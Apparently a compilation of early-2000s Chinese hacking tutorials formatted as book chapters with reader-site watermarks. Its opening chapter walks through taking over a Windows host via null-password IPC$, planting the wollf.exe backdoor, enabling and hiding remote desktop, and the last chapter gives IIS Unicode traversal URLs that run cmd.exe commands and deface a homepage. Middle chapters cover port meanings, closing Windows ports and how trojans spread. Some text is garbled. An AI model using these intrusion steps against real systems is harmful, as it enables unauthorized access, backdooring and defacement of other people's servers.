  02912Administrator(Admin)GuestIUSR_SERVERIWAM_SERVERTsInternetUser
  猜解成功用户帐号Administrator(Admin):(NULL)
  随便找了一台做实验,先ipc$连上再说。
  ==========================================================================================
  C:\DocumentsandSettings\shanlu.XZGJDOMAIN>netuse\\218.22.155.*\ipc$""/us
  er:administrator----------------连接成功!
  命令成功完成。
  C:\DocumentsandSettings\shanlu.XZGJDOMAIN>copywollf.exe\\218.22.155.*\admi
  n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
  已复制1个文件。
  C:\DocumentsandSettings\shanlu.XZGJDOMAIN>copyhbulot.exe\\218.22.155.*\adm
  in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
  已复制1个文件。
  C:\DocumentsandSettings\shanlu.XZGJDOMAIN>nettime\\218.22.155.*
  \\218.22.155.*的当前时间是2002/12/1上午06:37
  命令成功完成。
  C:\DocumentsandSettings\shanlu.XZGJDOMAIN>at\\218.22.155.*06:39wollf.exe
  新加了一项作业,其作业ID=1--指定wollf.exe在06:39运行
  ------------------------------------------------------------------------------------------
  说明:
  wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内
  容有关的命令参数,它的高级用法不做补充。
  hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。
  2分钟后......
  ==========================================================================================
  C:\DocumentsandSettings\shanlu.XZGJDOMAIN>wollf-connect218.22.155.*7614
  "WollfRemoteManager"v1.6
  Codebywollf,http://www.xfocus.org
  ------------------------------------------------------------------------------------------
  说明:
  使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf-connectIP7614
  7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。
  ==========================================================================================
  [server@D:\WINNT\system32]#dos
  MicrosoftWindows2000[Version5.00.2195]
  (C)版权所有1985-2000MicrosoftCorp.
  ------------------------------------------------------------------------------------------
  说明:
  输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。
  ==========================================================================================
  D:\WINNT\system32>cd..
  cd..
  D:\WINNT>dirh*.*
  dirh*.*
  驱动器D中的卷没有标签。
  卷的序列号是1CE5-2615
  D:\WINNT的目录
  2002-11-2703:07Help
  2002-09-1012:1610,752hh.exe
  2002-10-0108:2924,576HBULOT.exe
  2个文件35,328字节
  1个目录9,049,604,096可用字节
  D:\WINNT>hbulot
  hbulot
  ------------------------------------------------------------------------------------------
  说明:
  因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。
  ==========================================================================================
  D:\WINNT>exit
  exit
  Command"DOS"succeed.
  [server@D:\WINNT\system32]#reboot
  Command"REBOOT"succeed.
  [server@D:\WINNT\system32]#
  Connectionclosed.
  ------------------------------------------------------------------------------------------
  说明:
  由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT
  命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下
  。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装
  终端服务。
  到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!
  我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对
  目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口
  来躲过普通扫描器的扫描!修改方法如下:
  修改服务器端的端口设置,注册表有2个地方需要修改。
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp]
  PortNumber值,默认是3389,修改成所希望的端口,比如1314
  第二个地方:
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]
  PortNumber值,默认是3389,修改成所希望的端口,比如1314
  现在这样就可以了。重启系统吧。
  注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\
  表示具体的某个RDP-TCP连结。
  重启过后,看看端口有没有改。
  小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
優幽书萌 UUTxt.cOM 诠汶字板越渎


第三卷 第九章 字数:10617
  ?端口可分为3大类:
  1)公认端口(WellKnownPorts):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。
  2)注册端口(RegisteredPorts):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。
  3)动态和/或私有端口(Dynamicand/orPrivatePorts):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。
  本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。
  0通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
  1tcpmux这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp,guest,uucp,nuucp,demos,tutor,diag,EZsetup,OutOfBox,和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。
  7Echo你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。
  常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)
  另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“ResonateGlobalDispatch”,它与DNS的这一端口连接以确定最近的路由。
  Harvest/squidcache将从3130端口发送UDPecho:“如果将cache的source_pingon选项打开,它将对原始主机的UDPecho端口回应一个HITreply。”这将会产生许多这类数据包。
  11sysstat这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似
  再说一遍:ICMP没有端口,ICMPport11通常是ICMPtype=11
  19chargen这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggleDoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
  21ftp最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers利用这些服务器作为传送warez(私有程序)和pr0n(故意拼错词而避免被搜索引擎分类)的节点。
  22sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)
  还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。
  UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。
  23Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。
  25smtp攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。
  53DNSHacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。
  需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。
  67和68Bootp和DHCPUDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
  69TFTP(UDP)许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。
  79fingerHacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。
  98linuxconf这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuidroot,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)
  109POP2并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。
  110POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。
  111sunrpcportmaprpcbindSunRPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd,NFS,rpc.statd,rpc.csmd,rpc.ttybd,amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。
  记住一定要记录线路中的daemon,IDS,或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。
  113Identauth这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP,POP,IMAP,SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。
  119NNTPnews新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/.的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。
  135oc-servMSRPCend-pointmapperMicrosoft在这个端口运行DCERPCend-pointmapper为它的DCOM服务。这与UNIX111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-pointmapper注册它们的位置。远端客户连接到机器时,它们查询end-pointmapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行ExchangeServer吗?是什么版本?
  这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。
  137NetBIOSnameservicenbtstat(UDP)这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节
  139NetBIOSFileandPrintSharing通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
  大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5VisualBasicScripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。
  143IMAP和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。
  这一端口还被用于IMAP2,但并不流行。
  已有一些报道发现有些0到143端口的攻击源于脚本。
  161SNMP(UDP)入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。
  SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HPJetDirectremotemanagement软件使用SNMP。HPOBJECTIDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cablemodem,DSL)查询sysName和其它信息。
  162SNMPtrap可能是由于错误配置
  177xdmcp许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。
  513rwho可能是从使用cablemodem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。
  553CORBAIIOP(UDP)如果你使用cablemodem或DSLVLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remoteprocedurecall)系统。Hacker会利用这些信息进入系统。
  600Pcserverbackdoor请查看1524端口
  一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统--AlanJ.Rosenthal.
  635mountdLinux的mountdBug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。
  1024许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat-a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。
  ?ersion0.4.1,June20,2000
  http://www.robertgraham.com/pubs/firewall-seen.html
  Copyright1998-2000byRobertGraham(mailto:firewall-seen1@robertgraham.com.
  Allrightsreserved.Thisdocumentmayonlybereproduced(wholeor
  inpart)fornon-commercialpurposes.Allreproductionsmust
  containthiscopyrightnoticeandmustnotbealtered,exceptby
  permissionoftheauthor.
  1025参见1024
  1026参见1024
  1080SOCKS
  这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。
  1114SQL
  系统本身很少扫描这个端口,但常常是sscan脚本的一部分。
  1243Sub-7木马(TCP)
  参见Subseven部分。
  1524ingreslock后门
  许多攻击脚本将安装一个后门Sh*ll于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd,ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Sh*ll。连接到600/pcserver也存在这个问题。
  2049NFS
  NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。
  3128squid
  这是SquidHTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。
  5632pcAnywere
  你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。
  6776Sub-7artifact
  这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)
  6970RealAudio
  RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。
  13223PowWow
  PowWow是TribalVoice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。
  17027Conducent
  这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:
  机器会不断试图解析DNS名─ads.conducent.com,即IP地址216.33.210.40;216.33.199.77;216.33.199.80;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)
  27374Sub-7木马(TCP)
  参见Subseven部分。
  30100NetSphere木马(TCP)
  通常这一端口的扫描是为了寻找中了NetSphere木马。
  31337BackOrifice“elite”
  Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E,1=L,7=T)。因此许多后门程序运行于这一端口。其中最有名的是BackOrifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的木马程序越来越流行。
  31789Hack-a-tack
  这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT,RemoteAccessTrojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)
  32770~32900RPC服务
  SunSolaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。
  33434~33600traceroute
  如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute部分。
  41508Inoculan
  早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见
  http://www.circlemud.org/~jelson/software/udpsend.html
  http://www.ccd.bnl.gov/nss/tips/inoculan/index.html
  (二)下面的这些源端口意味着什么?
  端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。参见1.9。
  常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。
  ServerClient服务描述
  1-5/tcp动态FTP1-5端口意味着sscan脚本
  20/tcp动态FTPFTP服务器传送文件的端口
  53动态FTPDNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。
  123动态S/NTP简单网络时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。
  27910~27961/udp动态QuakeQuake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。
  61000以上动态FTP61000以上的端口可能来自LinuxNAT服务器(IPMasquerade)
幽憂书萌 uUTXt.CoM 全蚊子板阅镀


第三卷 第一十章 字数:1129
  ?关于win2000下关闭无用端口的方法,我在以前的贴子和我昨天写的共享文件夹安全中都提到过。
  在这里我作为我写的安全知识基础二供大家参考:
  每一项服务都对应相应的端口,比如众如周知的WWW服务的端口是80,smtp是25,ftp是21,win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要,关掉端口也就是关闭无用的服务。
  “控制面板”的“管理工具”中的“服务”中来配置。
  1、关闭7.9等等端口:关闭SimpleTCP/IPService,支持以下TCP/IP服务:CharacterGenerator,Daytime,Discard,Echo,以及QuoteoftheDay。
  2、关闭80口:关掉WWW服务。在“服务”中显示名称为"WorldWideWebPublishingService",通过Internet信息服务的管理单元提供Web连接和管理。
  3、关掉25端口:关闭SimpleMailTransportProtocol(SMTP)服务,它提供的功能是跨网传送电子邮件。
  4、关掉21端口:关闭FTPPublishingService,它提供的服务是通过Internet信息服务的管理单元提供FTP连接和管理。
  5、关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。
  6、还有一个很重要的就是关闭server服务,此服务提供RPC支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享,比如ipc$、c$、admin$等等,此服务关闭不影响您的共他操作。
  7、还有一个就是139端口,139端口是NetBIOSSession端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。以前流光2000用来判断对方主机类型不太准确,估计就是139端口开放既认为是NT机,现在好了。
  关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
  对于个人用户来说,可以在各项服务属性设置中设为“禁用”,以免下次重启服务也重新启动,端口也开放了。
u滺书盟 UUtxT.COM 诠文自坂越渎


第三卷 第一十一章 字数:1410
  ?木马,也称特伊洛木马,名称源于古希腊的特伊洛马神话,此词语来源于古希腊的神话故事,传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。
  尽管资深的黑客不屑于使用木马,但在对以往网络安全事件的分析统计里,我们发现,有相当部分的网络入侵是通过木马来进行的,包括去年微软被黑一案,据称该黑客是通过一种普通的蠕虫木马侵入微软的系统的,并且窃取了微软部分产品的源码。
  木马的危害性在于它对电脑系统强大的控制和破坏能力,窃取密码、控制系统操作、进行文件操作等等,一个功能强大的木马一旦被植入你的机器,攻击者就可以象操作自己的机器一样控制你的机器,甚至可以远程监控你的所有操作。
  木马是如何侵入的?
  一般的木马都有客户端和服务器端两个执行程序,其中客户端是用于攻击者远程控制植入木马的机器,服务器端程序即是木马程序。攻击者要通过木马攻击你的系统,他所做的第一步是要把木马的服务器端程序植入到你的电脑里面。
  目前木马入侵的主要途径还是先通过一定的方法把木马执行文件弄到被攻击者的电脑系统里,如邮件、下载等,然后通过一定的提示故意误导被攻击者打开执行文件,比如故意谎称这是个木马执行文件是你朋友送给你贺卡,可能你打开这个文件后,确实有贺卡的画面出现,但这时可能木马已经悄悄在你的后台运行了。
  一般的木马执行文件非常小,大到都是几K到几十K,如果把木马捆绑到其它正常文件上,你很难发现的,所以,有一些网站提供的软件下载往往是捆绑了木马文件的,在你执行这些下载的文件,也同时运行了木马。
  木马也可以通过Script、ActiveX及Asp、Cgi交互脚本的方式植入,由于微软的浏览器在执行Script脚本上存在一些漏洞,攻击者可以利用这些漏洞传皤病毒和木马,甚至直接对浏览者电脑进行文件操作等控制,前不久就出现一个利用微软Scripts脚本漏洞对浏览者硬盘进行格式化的Html页面。如果攻击者有办法把木马执行文件上载到攻击主机的一个可执行WWW目录夹里面,他可以通过编制Cgi程序在攻击主机上执行木马目录.
  木马还可以利用系统的一些漏洞进行植入,如微软著名的IIS服务器溢出漏洞,通过一个IISHACK攻击程序即在把IIS服务器崩溃,并且同时在攻击服务器执行远程木马执行文件。
  木马如何将入侵主机信息发送给攻击者?
  木马在被植入攻击主机后,它一般会通过一定的方式把入侵主机的信息,如主机的IP地址、木马植入的端口等发送给攻击者,这样攻击者有这些信息才能够与木马里应外合控制攻击主机。
  在早期的木马里面,大多都是通过发送电子邮件的方式把入侵主机信息告诉攻击者,有一些木马文件干脆把主机所有的密码用邮件的形式通知给攻击者,这样攻击都就不用直接连接攻击主机即可获得一些重要数据,如攻击OICQ密码的GOP木马即是如此。
  使用电子邮件的方式对攻击者来说并不是最好的一种选择,因为如果木马被发现,可以能过这个电子邮件的地址找出攻击者。现在还有一些木马采用的是通过发送UDP或者ICMP数据包的方式通知攻击者。
幽U書萌 uutxt。cOm 诠纹子板越镀


第三卷 第一十二章 字数:6499
  ?==========================================
  我们要介绍如何掌握一台主机的基本信息,期待中……
  ---------------------------------
  真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,
  好了,开始做操。今天的内容是获得主机的信息。我们要黑一台主机,首先要了解它的信息,
  包括它的类型,用户列表,目录,端口,漏洞等等。
  首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)第一部,呵呵,
  先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。然后,
  我们应该知道它的ip,很简单,ping它一下就可以了。pingwww.flyingfish.com,看看窗口里有
  了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人
  是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,
  禁止ping,不过这种可能很小。知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值
  21--ftp重要哦
  23--telnet欢呼吧
  25-smtp尽管重要,但似乎没什么可利用的53--domain同上
  79--finger可知道用户信息了
  80--http要看网页,没它不行吧
  110--pop收信的
  139--netbios共享用的,很有利用价值哦
  3389--win2000超级终端呵呵,这个好!
  其实端口有上千种,这些最最常用
  我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan,superscan,flux等等
  很多哦。这里我推荐superscan,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估
  计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)
  那么我们该如何应对呢?ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)
  若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scanflux等吧!反正,有ftp就有一份希望
  telnet在!好!telnet111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级白痴:)
  随便猜个,错了,闪人!
  二,一切从基础开始
  由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以
  下请求:(假设11.11.22.22有漏洞)
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
  学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,
  如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。
  如果成功,那么在浏览区可看到如下信息:
  DirectoryofC:\inetpub\scripts
  2000-09-2815:49〈DIR〉.
  2000-09-2815:49〈DIR〉..(假设目录中没有文件,实际上有一大堆)
  是不是有自己机器的感觉了,正点!就是这种感觉!
  cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
  http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir(这个命令同样道理)
  大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe
  会dos的朋友一定懂其意义了,不懂的请去看书.
  不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!
  三,实战演练
  1,修改主页!(是不是很爽?)
  一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。
  最方便的方法:在浏览器里输入http://11.11.22.22/.ida要是有漏洞,那在浏览器里便会显示主页路径,这个漏洞存在率很高,自然是我们的首选。
  分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。
  dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上
  有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入
  这条命令dirc:\iloveu.gif/s意味着查找c盘下所有目录里的iloveu.gif,注意
  实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。
  找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,
  default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm
  那么我们就修改它吧!
  最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echocshu>c:\autoexe.bat就是把
  cshu加入autoexec.bat里并删除原有内容,echocshunice>>c:\autoexec.bat
  就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
  回应为:HTTP500-内部服务器错误通过对cmd的分析,袁哥得出一条简便的方法,加入"符号
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm
  回应为:cgi错误,不用理会
  两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧
  而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copycmd.exe
  为另一个exe,记住路径,用copy后的来echo
  例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
